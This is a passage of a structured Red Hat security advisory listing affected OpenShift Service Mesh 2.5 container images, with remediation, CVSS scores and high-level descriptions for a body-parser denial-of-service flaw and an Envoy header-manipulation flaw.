"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", 